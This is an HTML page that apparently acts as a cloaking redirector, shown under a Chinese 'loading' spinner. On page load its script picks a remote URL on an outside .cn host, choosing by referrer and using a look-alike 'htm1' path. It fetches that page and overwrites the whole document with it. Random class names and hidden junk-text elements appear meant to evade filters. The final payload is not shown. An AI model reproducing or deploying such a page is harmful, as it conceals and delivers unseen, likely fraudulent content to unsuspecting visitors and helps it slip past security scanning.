<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VC0EdoU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VC0EdoU .Lae1TZvttl {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VC0EdoU .content {
            line-height: 50px;
            text-align: center
        }

        .VC0EdoU .img {
            width: 100%
        }

        .VC0EdoU .l58ofvoEL0P {
            text-align: center
        }

        .VC0EdoU .l58ofvoEL0P span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VC0EdoU .l58ofvoEL0P span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VC0EdoU .l58ofvoEL0P span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VC0EdoU .l58ofvoEL0P span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VC0EdoU .l58ofvoEL0P span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VC0EdoU .l58ofvoEL0P span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VC0EdoU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NPS6xnq7WjUK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DyzpN = NPS6xnq7WjUK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DyzpN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DyzpN +".html?a=share";
		}
		
        OrxwejTwIe=url+"#"+new Date().getTime();
        OrxwejTwIe && function() {
            $.get(OrxwejTwIe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >n9JV8Db3zFbKzgH1qnXJHaDEe49zFFcDc44qPbH0DWqNG4WrSBkAd8ve65iWLpRYpP7XXmbfgwTdh66fMcH</li>
<a  href='#' style='display:none'>uebqwqWVv2i695ZZX581e6rxEnq</a>
<p  style='display:none'>H2b5YITmDAAChDKF</p>
<div style='display:none'>Tpm2gBk181mHXhNWrxPBzGSCWn7KULLYAyRww3d9ujGyOSYYKk8RFSceQoq7wV3Ck9NlBLy56Sl9TpQlbsg7bK0</div>
<b style='display:none' >OfOmA1RW4dUottF96</b><div class="VC0EdoU">
    <div class="Lae1TZvttl">
        <div class="l58ofvoEL0P">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >v0SoXIhRJdIcgeZKOsm2m0XP2PZpmHaE6bwHZhgYqixkNAbHHCIW2EbnvJDO0x1yLyRv44OtCVgIvNriHRRsWBOpPeu6ME</ul>
<p  style='display:none'>NAUqiD6xKHYaEaokHJrT74VxGotwOXxKbhdseZGusHiDSb</p>
<a  href='#' style='display:none'>JOC3sWSa7Tt9</a>
<h1 style='display:none' >Uktx1q46Te8k3ufWyLNUu</h1>
<b style='display:none' >grD75LVtW1Ing5QWWvNXhrHPVVbrcajUWePEwHs</b>
<div style='display:none'>cBfvI0JP4pULISZZ27hUz3za9TgGhdiC7UBqv5TSFoxNp1zUwehoKhfLUdyLLtJDE2fYCnc</div>
<a  href='#' style='display:none'>JOC3sWSa7Tt9</a>
<li style='display:none' >pNzwwkC7jLqOFNHLHAO0rtxO7NgRNMdlTyFmWcgYmaBbRLLYgCA</li>
<img  src='' style='display:none'></body>
</html>